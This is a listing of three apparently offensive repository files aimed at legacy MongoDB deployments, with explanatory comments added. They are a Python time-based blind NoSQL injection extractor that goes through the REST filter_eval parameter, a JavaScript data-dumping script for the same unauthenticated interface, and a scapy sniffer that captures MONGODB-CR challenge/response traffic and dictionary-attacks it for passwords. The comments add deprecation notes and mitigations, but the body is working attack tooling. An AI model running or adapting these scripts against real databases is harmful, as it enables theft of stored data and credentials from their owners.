#!/usr/bin/python
# Listing note: the original page rendered three repository files back to back
# (blind_nosql.py, rest_inject_old.js, sniff_brute.py) collapsed onto a few
# lines with gutter numbers. The gutter cells are dropped here and the
# "/<file>:" separators are kept as comments; the code itself is unchanged.
# All Python here is Python 2 (print statements, xrange, urllib.urlopen).
#
# ==== /blind_nosql.py ====
# Time-based blind extraction against MongoDB's legacy HTTP interface on port
# 28017 (mongod port + 1000), whose `filter_eval` parameter was executed as
# server-side JavaScript. That interface existed only when mongod ran with
# --rest; it was deprecated in 3.2 and removed in 3.6. Defensive takeaways:
# never expose 28017, do not enable --rest, require authentication, and set
# security.javascriptEnabled: false where server-side JS is not needed.
from time import *
import urllib

def get_ans(query):
    """Return 1 if the injected `query` made the server stall, else 0.

    Issues a GET to /admin/$cmd/ whose filter_eval opens a second connection
    to 127.0.0.1, selects the "secure_nosql" database and, when `query` is
    truthy, calls sleep(9000). Only the wall-clock delta around urlopen() is
    read; the response body is discarded. Detection: every "true" answer is
    a request carrying a filter_eval parameter that takes ~9 s to complete,
    which stands out in HTTP access logs.
    """
    # "%u" is an obsolete alias of "%d" in Python 2: truncates to whole seconds.
    t1 = int("%u" % time())
    url = 'http://localhost:28017/admin/$cmd/?filter_eval=conn = new Mongo("127.0.0.1"); db = conn.getDB("secure_nosql"); if ( '+query+') { sleep(9000); exit; }&limit=1'
    urllib.urlopen(url)  # response ignored; only elapsed time matters
    t2 = int("%u" % time())
    # 2 s threshold against a 9 s server-side sleep leaves margin for jitter.
    if (t2 - t1) >= 2 :
        return 1
    else:
        return 0

def get_coll_names_count(num):
    """Count up from 0 until the server confirms collection `num`'s name length.

    Each iteration sends two probes: the loop condition (for index `num`) and
    the printed get_ans() call, which always probes index 0 regardless of
    `num`. There is no upper bound, so the loop does not terminate if no
    length ever matches.
    """
    print "*****************\nGetting length of "+str(num)+" collection\n*****************"
    count = 0
    while get_ans('db.getCollectionNames()['+str(num)+'].length == "'+str(count)+'"') != 1:
        print get_ans('db.getCollectionNames()[0].length == "'+str(count)+'"')
        print "Trying "+str(count)+" symbols"
        count+=1

    print "Found - "+str(count)+" symbols"
    return count


def get_coll_names(num):
    """Recover the name of collection `num` one character position at a time.

    For each position 0..len-1 (len from get_coll_names_count) the lowercase
    letters a-z are tried in order and the first confirmed one is appended.
    A position whose character is outside a-z matches nothing and is silently
    skipped, so the returned `word` may be shorter than the probed length.
    """
    print "*****************\nGetting the name of "+str(num)+" collection\n*****************"
    word=''
    for a in xrange(get_coll_names_count(num)):
        for sym in "abcdefghijklmnopqrstuvwxyz":
            print "["+str(a)+"] Trying '"+sym+"'"
            if get_ans('db.getCollectionNames()['+str(num)+']['+str(a)+'] == "'+str(sym)+'"') == 1:
                print "["+str(a)+"] Found '"+sym+"'"
                word += sym
                print word
                break
    print word
    return word


def get_document_from_collection_count(num, col):
    """Count up until the server confirms the length of tojson(document `num`).

    Same unbounded counting loop as get_coll_names_count, applied to the
    JSON rendering of db.<col>.find()[num]; one probe per candidate length.
    """
    print "*****************\nGetting length of "+str(num)+" document in "+str(col)+" collection \n*****************"
    count = 0
    while get_ans('tojson(db.'+str(col)+'.find()['+str(num)+']).length == "'+str(count)+'"') != 1:
        print "Trying "+str(count)+" symbols"
        count+=1

    print "Found - "+str(count)+" symbols"
    return count


def get_document_from_collection(num, col):
    """Recover tojson(document `num` of collection `col`) character by character.

    Positions start at 50, presumably to skip a fixed-length prefix of the
    tojson output (cannot be confirmed from here). The alphabet covers
    letters, digits, punctuation, space, tab and newline; each candidate is
    passed through urllib.quote_plus so it survives the query string. As in
    get_coll_names, a position that matches no candidate is skipped.
    """
    print "*****************\nGetting "+str(num)+" from "+col+" collection\n*****************"
    word=''
    for a in xrange(50, get_document_from_collection_count(num, col)):
        for sym in "ABCDEFGHIJKLMNOPQRSTUVWXYZ<>,./?abcdefghijklmnopqrstuvwxyz: {}]['\"!@#$^%&*()_-1234567890=\t\n":
            print "["+str(a)+"] Trying '"+sym+"'"
            if get_ans('tojson(db.'+col+'.find()['+str(num)+'])['+str(a)+'] == "'+str(urllib.quote_plus(sym))+'"') == 1:
                print "["+str(a)+"] Found '"+sym+"'"
                word += sym
                print word
                break
    print word
    return word


# Example invocation, left disabled in the original.
#get_document_from_collection(0, get_coll_names(2))

// ==== /rest_inject_old.js ====
// Browser-side counterpart of blind_nosql.py: relative URLs and synchronous
// XHR, so it is meant to run from a page served by the same legacy MongoDB
// HTTP interface. It reads results directly rather than timing them, which
// only works when /listDatabases, /<db>/<coll>/ and /admin/$cmd/ answer
// without authentication. The mitigations listed above apply unchanged.

// Return an XHR object: the two IE ActiveX names are tried first, then
// XMLHttpRequest; `false` when none is available.
function getXmlHttp(){
    var xmlhttp;
    try {
        xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
    } catch (e) {
        try {
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        } catch (E) {
            xmlhttp = false;
        }
    }
    if (!xmlhttp && typeof XMLHttpRequest!='undefined') {
        xmlhttp = new XMLHttpRequest();
    }
    return xmlhttp;
}

// Return the name of database `num` from /listDatabases, JSON-encoded
// (JSON.stringify keeps the surrounding double quotes). Returns undefined on
// a non-200 status; there is no range check on `num`. `a` is assigned
// without var and so becomes an implicit global (same in the two callers
// below).
function getDatabases(num) {
    var xmlhttp = getXmlHttp()
    xmlhttp.open('GET', '/listDatabases?text=1', false);  // synchronous
    xmlhttp.send(null);
    if(xmlhttp.status == 200) {
        a = JSON.parse(xmlhttp.responseText);
        return JSON.stringify(a.databases[num].name)
    }
}

// Run a function server-side via filter_eval that opens a new connection to
// `host`, selects `db` and returns its collection names; entry `num` of the
// result is returned JSON-encoded. `db` is interpolated unquoted, so the
// quoted value getDatabases() returns is what this expects.
function getCollectionFromDB(num, db, host) {
    var xmlhttp = getXmlHttp()
    xmlhttp.open('GET', '/admin/$cmd/?filter_eval=function() {conn = new Mongo("'+host+'"); db = conn.getDB('+ db +'); return db.getCollectionNames(); }&limit=1', false);
    xmlhttp.send(null);
    if(xmlhttp.status == 200) {
        a = JSON.parse(xmlhttp.responseText);
        return JSON.stringify(a.rows[0].retval[num])
    }
}

// Fetch the REST listing /<db>/<coll>/ and return row `num` as text. The two
// replace("\"", "") calls strip the first two double quotes from each name
// (String.replace with a string pattern replaces only the first match).
// slice(43,-1) drops a fixed-length prefix of the row's JSON — presumably the
// "_id" wrapper; cannot be confirmed from here — and the first comma becomes
// a space.
function getDocumentFromColl(num, coll, db) {
    var xmlhttp = getXmlHttp()
    xmlhttp.open('GET', '/'+db.replace("\"", "").replace("\"", "")+'/'+coll.replace("\"", "").replace("\"", "")+'/', false);
    xmlhttp.send(null);
    if(xmlhttp.status == 200) {
        a = JSON.parse(xmlhttp.responseText);
        return JSON.stringify(a.rows[num]).slice(43,-1).replace(",", " ");
    }
}

// Example run: document 0 of collection 2 of database 0. getCollectionFromDB
// is called with two arguments here, so its `host` parameter is undefined
// for this call; the trailing "127.0.0.1" is not bound to any parameter of
// getDocumentFromColl (declared with three).
b = getDocumentFromColl(0, getCollectionFromDB(2, getDatabases(0)), getDatabases(0), "127.0.0.1" )
console.log(b);

# ==== /sniff_brute.py ====
#!/usr/bin/python
#coding: utf8
# Passive capture of a MongoDB authentication exchange followed by a
# dictionary attack on the captured challenge/response. gen_pass() is the
# MONGODB-CR key derivation, md5(nonce + user + md5(user + ":mongo:" + pwd)).
# MONGODB-CR was deprecated in 3.0 and removed in 4.0 in favour of SCRAM, and
# the capture below runs on the loopback interface, which needs local
# privileges on the host. Defensive takeaways: use SCRAM (SHA-256) and TLS on
# client connections so no nonce/key pair is ever observable in clear text.
__author__ = "cyber-punk"

from scapy.all import *
import re
import hashlib

md5 = hashlib.md5

print "*********************\n*MongoDB Hacker Tool*\n***Sniff and Brute***\n*********************\n"


def get_packets(port, iface, count):
    """Capture `count` packets on `iface` matching the BPF filter "port <port>"."""
    packets = sniff(filter="port "+str(port)+"", count=count, iface=str(iface))
    return packets

def parse_packets(port, iface, count):
    """Return (user, nonce, key) pulled from the first captured packet mentioning "key".

    The packet's printable tokens (runs of 3+ alphanumerics) are taken at the
    fixed indices 4, 6 and 8 — an assumption about the wire layout that
    cannot be verified here. If no packet contains the token "key", `packet`
    is never assigned and the function raises NameError.
    """
    print "Sniff packages..."
    packets = get_packets(port, iface, count)
    print "Parse packages..."
    for i in xrange(len(packets)):
        if "key" in re.findall(r'[A-Za-z0-9]{3,}', str(packets[i])):
            packet=packets[i]
            break
    user = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[4]
    nonce = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[6]
    key = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[8]
    return user, nonce, key


def gen_pass(user, nonce, passw):
    """MONGODB-CR response digest for a candidate password.

    The inner md5 of "user:mongo:password" is the value MongoDB stored as the
    password hash; the outer md5 over nonce + user + that hex digest is what
    the client sends. str(passw) tolerates non-string dictionary entries.
    """
    return md5(nonce + user + md5(user + ":mongo:" + str(passw)).hexdigest()).hexdigest();


def brute_pass():
    """Capture 10 packets on lo/27017, then test dict.txt line by line.

    A second handle on dict.txt is opened only to count its lines; the loop
    then reads one candidate per iteration from the first handle, strips the
    trailing newline, and stops at the first derived key equal to the
    captured one. Neither handle is closed, and `file` shadows the builtin.
    """
    user, nonce, key = parse_packets("27017", "lo", 10)
    print "Prepair to brute..."
    file = open('dict.txt')
    file_len = open('dict.txt')
    for i in xrange(len(file_len.readlines())):
        passw = file.readline().split('\n')[0]
        if gen_pass(user, nonce, passw) == key:
            print "\nFound - "+user+":"+passw
            break


# Script entry point: runs the capture and dictionary loop on import.
brute_pass()